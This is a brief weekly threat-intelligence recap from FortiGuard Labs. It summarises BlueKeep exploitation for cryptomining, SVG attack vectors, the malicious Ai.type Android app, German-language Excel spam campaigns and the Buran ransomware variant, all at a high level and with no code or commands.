Each week, FortiGuard Labs publishes a Threat Brief to subscribers that profiles notable hot topics and threats that were discovered or discussed during the week. Here is a recap of what we are covering in this week’s Threat Brief:
- A public exploit module for the BlueKeep vulnerability (CVE-2019-0708) was added to the open-source Metasploit penetration testing framework in September. We are now seeing hackers deploying the exploit and then installing a cryptocurrency miner. The BlueKeep vulnerability has the potential to turn into a wormable event that could spread from one machine to another. Fortunately, this first hacking operation did not turn out to include worm-like capabilities, but is simply being used to generate virtual cash through cryptomining.
- FortiGuard Labs researchers have been assessing web applications with embedded Scalable Vector Graphics (SVG) images. SVG is an XML-based vector image format for two-dimensional graphics with support for interactivity and animation. SVG images and their behaviors are defined in XML text files. They can be created and edited with any text editor, as well as with drawing software. All major modern web browsers have SVG rendering support. Though SVG provides flexibility that enables the creation of more dynamic web content, it also introduces additional security risks. We discuss common SVG attack vectors, such as embedding malware.
- Ai.type is a popular Android keyboard app that personalizes your keyboard and includes features like learning your writing style and auto-correcting typing mistakes. Earlier this year, Google Play removed the Ai.type app from Google Play once it was identified as malicious, but not after the application had been downloaded on at least 40 million Android devices. Once downloaded, the app makes suspicious requests to trigger the purchase of premium digital services.
- This week, researchers spotted two large-scale spam campaigns using Excel attachments. The emails were all written in German and referred readers to open a bill in an attached document. It is unusual to see such large-scale campaigns, as it is easier for smaller campaigns to evade spam detection. This campaign had shades of a spam campaign FortiGuard Labs published research on earlier this year, but that campaign was targeting Japanese users.
- We also discuss a new Buran ransomware variant which uses the Ransomware-as-a-Service model. Buran is delivered by the popular RIG Exploit Kit. Due to the appearance of this RaaS in Russian-language forums, and its protection from being executed in Russia, Belarus, and Ukraine, it is believed that the developers behind Buran are located in Russia.
Read about the FortiGuard Security Rating Service, which provides security audits and best practices.